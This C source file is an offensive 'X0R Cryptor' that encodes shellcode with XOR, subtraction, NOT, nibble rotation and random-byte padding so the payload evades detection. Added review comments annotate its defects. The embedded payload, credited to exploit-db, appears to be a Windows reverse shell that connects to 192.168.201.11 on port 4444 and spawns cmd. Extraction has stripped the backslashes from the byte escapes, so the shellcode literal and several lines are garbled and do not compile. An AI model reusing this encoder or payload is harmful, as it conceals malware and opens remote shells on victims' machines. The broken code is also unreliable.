/**
*
* ____ ___________ _______ __________
* / /\______ \______
* / | | / | | _/
* / | ` / | |
* /___/ /_______ /\____|__ /____|_ /
* \_/ / / /
*
* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*
* [*] X0R Cryptor with DEC/N0T/R0R encoder plus random byte insertion
* [*] Author: @xen0vas
*
* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <string.h>

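#define DEC 0x2 // the value that is subtracted from every byte during encoding

/*
 * ANSI SGR colour sequences used for terminal output. Each one must start
 * with the ESC byte (0x1b) followed by '['; without the leading backslash the
 * literal text "x1b[..." is printed instead of changing the colour.
 */
#define ANSI_COLOR_RED "\x1b[01;31m"
#define ANSI_COLOR_GREEN "\x1b[01;32m"
#define ANSI_COLOR_YELLOW "\x1b[01;33m"
#define ANSI_COLOR_BLUE "\x1b[01;34m"
#define ANSI_COLOR_MAGENTA "\x1b[01;35m"
#define ANSI_COLOR_CYAN "\x1b[01;36m"
#define ANSI_COLOR_RESET "\x1b[0m"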

/*
 * Repeating XOR key: the ASCII bytes of "secretkey" (9 bytes). main() cycles
 * through it one byte per output byte and also prints key bytes to stdout.
 * NOTE(review): the key is hard-coded and printed, so the XOR step is an
 * encoding layer, not a secret; anyone holding this source or the tool's
 * output can invert it.
 */
unsigned char XORKEY[] = { 0x73, 0x65, 0x63, 0x72, 0x65, 0x74, 0x6B, 0x65, 0x79 }; // secretkey

/*
 * Input payload for the encoder, credited to the exploit-db entry linked
 * below. main() treats sizeof(shellcode)-1 as the payload length, i.e. the
 * string literal without its implicit terminating NUL.
 * NOTE(review): every byte is written here as "xNN" without a backslash, so
 * as it stands this literal is plain ASCII text rather than raw byte values;
 * presumably the escape prefixes were lost when the page was extracted.
 * Confirm against the original before drawing conclusions from the lengths
 * the program prints.
 */
/* https://www.exploit-db.com/shellcodes/50291 */
unsigned char shellcode[] =
"x31xc9x64x8bx41x30x8bx40x0cx8bx70x14xadx96xadx96xadx8b"
"x58x10x8bx53x3cx01xdax8bx52x78x01xdax8bx72x20x01xdex31"
"xc9x41xadx01xd8x81x38x47x65x74x50x75xf4x81x78x04x72x6f"
"x63x41x75xebx81x78x08x64x64x72x65x75xe2x8bx72x24x01xde"
"x66x8bx0cx4ex49x8bx72x1cx01xdex8bx14x8ex01xdax31xc9x53"
"x52x51x68x61x72x79x41x68x4cx69x62x72x68x4cx6fx61x64x54"
"x53x89xdexffxd2x83xc4x0cx5ax50x52x66xbax6cx6cx52x68x33"
"x32x2ex64x68x77x73x32x5fx54xffxd0x83xc4x10x8bx54x24x04"
"x68x75x70x61x61x66x81x6cx24x02x61x61x68x74x61x72x74x68"
"x57x53x41x53x54x50x89xc7xffxd2x31xdbx66xbbx90x01x29xdc"
"x54x53xffxd0x83xc4x10x31xdbx80xc3x04x6bxdbx64x8bx14x1c"
"x68x74x41x61x61x66x81x6cx24x02x61x61x68x6fx63x6bx65x68"
"x57x53x41x53x54x89xf8x50xffxd2x57x31xc9x52x52x52xb2x06"
"x52x41x51x41x51xffxd0x91x5fx83xc4x10x31xdbx80xc3x04x6b"
"xdbx63x8bx14x1cx68x65x63x74x61x66x83x6cx24x03x61x68x63"
"x6fx6ex6ex54x57x87xcdxffxd2x68xc0xa8xc9x0bx66x68x11x5c"
"x31xdbx80xc3x02x66x53x89xe2x6ax10x52x55x87xefxffxd0x83"
"xc4x14x31xdbx80xc3x04x6bxdbx62x8bx14x1cx68x73x41x61x61"
"x81x6cx24x02x61x61x00x00x68x6fx63x65x73x68x74x65x50x72"
"x68x43x72x65x61x54x89xf5x55xffxd2x50x8dx28x68x63x6dx64"
"x61x66x83x6cx24x03x61x89xe1x31xd2x83xecx10x89xe3x57x57"
"x57x52x52x31xc0x40xc1xc0x08x50x52x52x52x52x52x52x52x52"
"x52x52x31xc0x04x2cx50x89xe0x53x50x52x52x52x31xc0x40x50"
"x52x52x51x52xffxd5";

/*
 * Writes the start-up banner to stdout: the ANSI_COLOR_YELLOW sequence, the
 * block-character logo rows, and the author credit line.
 */
void banner(){
    /* Fragments are emitted in this order with nothing inserted between them. */
    static const char *const rows[] = {
        ANSI_COLOR_YELLOW,
        " ",
        " ▄ ▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄ ",
        " ▐░▌ ▐░▌▐░░░░░░░░░░▌ ▐░░▌ ▐░▌▐░░░░░░░░░░░▌ ",
        " ▐░▌ ▐░▌ ▐░█▀▀▀▀▀▀▀█░▌▐░▌░▌ ▐░▌▐░█▀▀▀▀▀▀▀█░▌ ",
        " ▐░▌ ▐░▌ ▐░▌ ▐░▌▐░▌▐░▌ ▐░▌▐░▌ ▐░▌ ",
        " ▐░▐░▌ ▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌▐░█▄▄▄▄▄▄▄█░▌ ",
        " ▐░▌ ▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌▐░░░░░░░░░░░▌ ",
        " ▐░▌░▌ ▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌▐░█▀▀▀▀█░█▀▀ ",
        " ▐░▌ ▐░▌ ▐░▌ ▐░▌▐░▌ ▐░▌▐░▌▐░▌ ▐░▌ ",
        " ▐░▌ ▐░▌ ▐░█▄▄▄▄▄▄▄█░▌▐░▌ ▐░▐░▌▐░▌ ▐░▌ ",
        " ▐░▌ ▐░▌▐░░░░░░░░░░▌ ▐░▌ ▐░░▌▐░▌ ▐░▌ ",
        " ▀ ▀ ▀▀▀▀▀▀▀▀▀▀ ▀ ▀▀ ▀ ▀ ",
        " ",
        "[*] Author:"ANSI_COLOR_MAGENTA" @xen0vas "ANSI_COLOR_RESET" ",
    };

    for (size_t r = 0; r < sizeof rows / sizeof rows[0]; r++)
        fputs(rows[r], stdout);
}

/*
 * Entry point: encodes the global `shellcode` array and prints the result as
 * a C array initializer. Takes no arguments and returns 0.
 *
 * Visible steps:
 *   1. Build shellcode2 at twice the input length: even indices take the next
 *      input byte, odd indices take a rand() byte.
 *   2. For each byte: XOR with XORKEY (cycled over key_len), XOR with one
 *      random "magic" byte, subtract DEC, bitwise NOT, then the shift/or
 *      expression with rot = 4.
 *   3. If any resulting byte is zero, free everything and restart at `lol`.
 *   4. Copy to shellcode4 and print the key, both lengths and the bytes.
 *
 * Every step in (2) is a byte-wise bijection and the key is fixed in this
 * file, so the output is a reversible encoding of the input; the decoded
 * bytes are unchanged, which is why analysis of decoded memory and runtime
 * behaviour is unaffected by this layer.
 *
 * NOTE(review): the code below is documented as found. It contains memory
 * safety and correctness defects that are flagged inline and left unfixed.
 */
int main(void)
{
banner();
printf(ANSI_COLOR_YELLOW"[*] X0R Cryptor with DEC/N0T/R0R encoder v1.0.0 ");
printf(ANSI_COLOR_BLUE);
printf("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ");
printf(ANSI_COLOR_RESET);

// NOTE(review): i is a signed int but is compared against size_t expressions
// in every loop below (signed/unsigned comparison); j is never used.
int rot,kk,ll,i,l,k,j;

int key_len = sizeof(XORKEY);

// Retry target: reached again via `goto lol` when an output byte is zero.
lol:

rot = 4; //right rotation 4 bits
// One-byte scratch buffer holding the most recent rand() byte.
// NOTE(review): none of the malloc() results in this function are checked.
unsigned char *buffer = (unsigned char*)malloc(sizeof(unsigned char));
// NOTE(review): the generator is re-seeded on every pass through `lol`. A
// retry inside the same second gets the same seed and so the same rand()
// sequence, which means it repeats the same result until time() advances.
srand((unsigned int)time(NULL));

// NOTE(review): the size is sizeof(char*) * ((len*2)/8), but the loops below
// write len*2 bytes. The integer division rounds down, and where pointers are
// narrower than 8 bytes the product is smaller still, so the writes can run
// past the end of the allocation (heap buffer overflow). The size needed is
// (sizeof(shellcode)-1)*2 bytes.
unsigned char *shellcode2 =(unsigned char*)malloc(sizeof(char*) * (((sizeof(shellcode)-1)*2)/8) );
// NOTE(review): '' is an empty character constant and does not compile;
// presumably '\0' lost its backslash when the page was extracted.
memset(shellcode2, '', sizeof(char*) * (((sizeof(shellcode)-1)*2)/8) );

// placeholder to copy the random bytes using rand
// Only element 0 of this array is ever read or written.
unsigned char shellcode3[] = "xbb";

// Same size expression, and the same sizing problem, as shellcode2 above.
unsigned char *shellcode4 = (unsigned char*)malloc(sizeof(char*) * (((sizeof(shellcode)-1)*2)/8) );
memset(shellcode4, '', sizeof(char*) * (((sizeof(shellcode)-1)*2)/8) );

// l indexes the input array; k holds the parity of the output index.
l = 0;
k = 0;

// random byte insertion into even location
// (as written: input bytes go to even indices, random bytes to odd indices)
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/

for (i=0; i<((sizeof(shellcode)-1)*2); i++)
{
// generate random bytes
buffer[0] = rand() & 0xff;
memcpy(&shellcode3[0],(char*)&buffer[0],sizeof(buffer[0]));
k = i % 2;
if (k == 0)
{
shellcode2[i] = shellcode[l];
l++;
}
// This condition is always true here; a plain `else` would be equivalent.
else if ( k != 0 )
{
shellcode2[i] = shellcode3[0];
}
}

// kk is the position in XORKEY; ll counts zero bytes found (retry flag).
kk = 0;
ll = 0;

// Beat the nulls !
// One random byte, XORed into every output byte of this attempt.
buffer[0] = rand() & 0xff;

for (i=0; i<(sizeof(shellcode)-1)*2; i++)
{

// Wrap the key index so XORKEY repeats.
if (kk == key_len) kk = 0;

// XOR every byte with secretkey
shellcode2[i] = shellcode2[i] ^ XORKEY[kk];

shellcode2[i] = shellcode2[i] ^ buffer[0];

// NOTE(review): this printf sits inside the loop, so the same magic byte is
// printed once for every byte processed.
printf (" "ANSI_COLOR_YELLOW"[!]"ANSI_COLOR_GREEN" The magic byte to avoid nulls :"ANSI_COLOR_RED" 0x%02x"ANSI_COLOR_RESET, buffer[0] );

// subtract every byte by 2
shellcode2[i] = shellcode2[i] - DEC;

// one's complement negation
shellcode2[i] = ~shellcode2[i];

// perform the ROR method
// sizeof(shellcode2[i]) is 1, so this is (x << rot) | (x >> (8-rot)) truncated
// to one byte. With rot = 4 that swaps the two nibbles, where left and right
// rotation coincide; for any other rot the expression rotates LEFT, not right.
shellcode2[i] = (shellcode2[i] << rot) | (shellcode2[i] >> sizeof(shellcode2[i])*(8-rot));

// A zero byte abandons this attempt: release the three buffers and flag a
// retry. They are allocated again after the jump back to `lol`.
if (shellcode2[i] == 0)
{
free(shellcode4);
free(shellcode2);
free(buffer);
ll++;
break;
}

kk++;
}
if ( ll > 0) goto lol;

/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/

// Byte-by-byte copy of the encoded buffer into shellcode4.
for (i=0; i<(sizeof(shellcode)-1)*2; i++) {
memcpy(&shellcode4[i], (unsigned char*)&shellcode2[i],sizeof(shellcode2[i]));
}

printf(ANSI_COLOR_YELLOW" [*]"ANSI_COLOR_GREEN" The secret Key : ");
// NOTE(review): sizeof(key_len) is the size of an int, not the key length.
// Where int is 4 bytes this prints XORKEY[0..4], five of the nine key bytes;
// the bound was presumably meant to be key_len - 1.
for (int g=0; g<=sizeof(key_len); g++)
{
if (g==sizeof(key_len))
printf(ANSI_COLOR_RED"0x%02x"ANSI_COLOR_RESET, XORKEY[g]);
if (g<sizeof(key_len))
printf(ANSI_COLOR_RED"0x%02x, "ANSI_COLOR_RESET, XORKEY[g]);
}

// NOTE(review): the argument is a size_t, so the matching conversion is %zu
// rather than %lu.
printf(" "ANSI_COLOR_YELLOW"[*]"ANSI_COLOR_GREEN" Original Shellcode Length : "ANSI_COLOR_RED"%lu ", sizeof(shellcode)-1);

printf(ANSI_COLOR_BLUE);
printf("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~");
printf(ANSI_COLOR_RESET);

printf(" "ANSI_COLOR_YELLOW"[-]"ANSI_COLOR_GREEN" Encrypted shellcode :"ANSI_COLOR_RESET" ");


// Emit the encoded bytes as `unsigned char shellcode[] = { 0x.., ... };`.
// The three conditions select the opening element, the middle elements and
// the closing element.
for (i=0; i<(sizeof(shellcode)-1)*2; i++)
{
if (i==0)
printf(ANSI_COLOR_MAGENTA"unsigned char"ANSI_COLOR_RESET" shellcode[]"ANSI_COLOR_YELLOW" = "ANSI_COLOR_RESET"{ "ANSI_COLOR_YELLOW"0x%02x, "ANSI_COLOR_RESET"",shellcode4[i]);
if (i>0 && i<((sizeof(shellcode)-1)*2)-1)
printf(ANSI_COLOR_YELLOW"0x%02x, "ANSI_COLOR_RESET"",shellcode4[i]);
if (i == ((sizeof(shellcode)-1)*2)-1)
printf(ANSI_COLOR_YELLOW"0x%02x"ANSI_COLOR_RESET" };",shellcode4[i]);
}

// NOTE(review): as written this prints the literal text "33[01;32m";
// presumably it was the escape "\033[01;32m" before the backslash was lost.
printf("33[01;32m");
// NOTE(review): size_t argument again; %zu is the matching conversion, not %ld.
printf(" "ANSI_COLOR_YELLOW"[-]"ANSI_COLOR_GREEN" Encoded Shellcode Length : "ANSI_COLOR_RED"%ld "ANSI_COLOR_RESET,(sizeof(shellcode)-1)*2);
printf(" ");
// NOTE(review): buffer, shellcode2 and shellcode4 are not freed on this path.
return 0;
}

/* @xen0vas */